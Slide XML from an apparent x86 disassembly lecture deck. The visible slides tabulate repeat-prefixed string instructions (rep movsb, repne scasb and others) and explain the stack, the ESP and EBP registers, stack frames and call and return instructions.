                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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475920">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Repeat until  ECX = 0</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860040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>repe, repz</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Repeat until  ECX = 0 or ZF = 0</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r h="941760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>repne, repnz</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Repeat until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pP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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486"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Rep (repeat – until ECX=0) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="487" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259640" y="1845000"/>
          <a:ext cx="7056360" cy="2956680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2735280"/>
                <a:gridCol w="4321440"/>
              </a:tblGrid>
              <a:tr h="375120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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941760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>repe cmpsb</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Compare to data buffers. ESI, EDI are buffers’ locations. Repeat until  ECX = 0</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658440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep stosb</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Initialize all bytes of a buffer to a certain value</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r h="941760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep movsb</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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c>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Copy a buffer of bytes. Repeat until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pP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fd7e7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="941760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>repne scasb</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="26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c>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Search a data buffer for a single byte. Repeat until ECX=0 or byte not found.</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8ecf4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="5616360" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="63000"/>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The Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: LIFO structure for storing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Local variables of functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Parameters of functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Flow control of the program</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="371"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Return Address</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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Uses registers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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ESP: stack pointer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="371"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Address of the top of the stack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="445"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>EBP: base pointer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="371"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Keep track of the location of local variables and parameters</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Instructions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Enter, push</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>pop, call, leave, ret</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="490" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5940000" y="1728000"/>
            <a:ext cx="2592000" cy="4563720"/>
            <a:chOff x="5940000" y="1728000"/>
            <a:chExt cx="2592000" cy="4563720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="491" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940000" y="2123640"/>
              <a:ext cx="2592000" cy="3528000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="492" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156000" y="2991960"/>
              <a:ext cx="2160000" cy="647640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="493" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6131520" y="3887640"/>
              <a:ext cx="2160000" cy="647640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6146640" y="4775040"/>
              <a:ext cx="2160000" cy="647640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6191640" y="3131280"/>
              <a:ext cx="208872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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Current Stack Frame</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="496" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6163920" y="4026960"/>
              <a:ext cx="205308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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Caller’s Stack Frame</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="497" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6106320" y="4914360"/>
              <a:ext cx="2210040" cy="5173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400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Caller’s Caller’s Stack Frame</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="498" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6128640" y="1728000"/>
              <a:ext cx="222696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Low Memory Address</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="499" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6069960" y="5652000"/>
              <a:ext cx="227124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High Memory Address</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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0" name="Google Shape;875;p86" descr="Image result for function call in stack"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788000" y="2178360"/>
            <a:ext cx="4265280" cy="3198960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501"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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502"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1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>The Stack 🡪 Function call procedure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
